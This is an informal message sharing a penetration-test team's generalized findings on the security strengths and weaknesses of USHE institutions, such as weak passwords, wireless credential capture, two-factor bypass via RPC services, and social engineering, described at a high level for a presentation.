Hey guys,
I'm presenting briefly at the NISST meeting tomorrow. Below is a list that Mark and I presented to the CIOs last summer of generalized findings, this is roughly what I'll mention tomorrow. What else should we mention?
The Good
Each USHE institution has an information security officer/office or has formally assigned Information Security roles to appropriate IT staff.
Intrusion Detection/Prevention Systems (IDS/IPS) are installed ubiquitously across USHE institutions; implementations vary, but all schools have the capability to detect and respond to scanning and other widespread or noisy attacks.
Two-factor authentication is becoming common at USHE institutions. Duo Security is the popular favorite. Properly implemented two-factor authentication slowed or stopped multiple team attacks, especially during the second fiscal year of this assessment cycle.
Internal network segmentation is common and effective against some direct attacks on infrastructure. Banner / PeopleSoft infrastructure is well protected in this manner.
All institutions are doing regular vulnerability scanning and acting on scan results. There are relatively few ‘low-hanging fruit’ remotely-exploitable vulnerabilities in the production networks at USHE institutions.
Overall, incremental improvements in security posture were found at all institutions.
The Bad
Mis-configured wireless devices are easily abused to obtain hashed credentials. The team was able to get valuable credentials using this attack at all USHE institutions.
Password length and complexity at USHE schools is inadequate. Approximately 30% of hashed credentials obtained by the team at each institution were cracked. Many of these credentials included IT and/or functional staff with privileged access to data or infrastructure.
Once directory credentials are obtained, it is mostly trivial to traverse through internal networks, enumerate directory services, and, depending in institutional practices, elevate to administrative credentials. Administrative credentials led to ‘pivots’ into sensitive or critical systems and networks.
Physical security is a mixed bag; the team was able to gain physical access to network and/or data center facilities at several institutions.
The Ugly
System Administrators often use the same accounts for day-to-day tasks and administration of critical systems. This is bad practice and was leveraged by the team at several institutions to leverage administrative access to critical systems.
Many attack methods and tools use native tools and systems (e.g. Windows PowerShell) that are mostly invisible to IDS/IPS and anti-malware as they appear to be legitimate activities, often using captured account credentials. These tools are leveraged heavily by the assessment team and presumably by attackers. No institutions currently have systems in place to find anomalous behaviors in this vein.
Two-factor authentication only protects interactive logins. In many cases, other services that cannot use two-factor authentication (e.g. Microsoft RPC services) were still exposed and used by the team to bypass two-factor authentication.
Social engineering will always be with us. Phishing emails, unlocked workstations, ‘lost’ USB devices, and in some cases, Helpdesk agents were helpful in team efforts to gain administrative access to institutional IT resources.
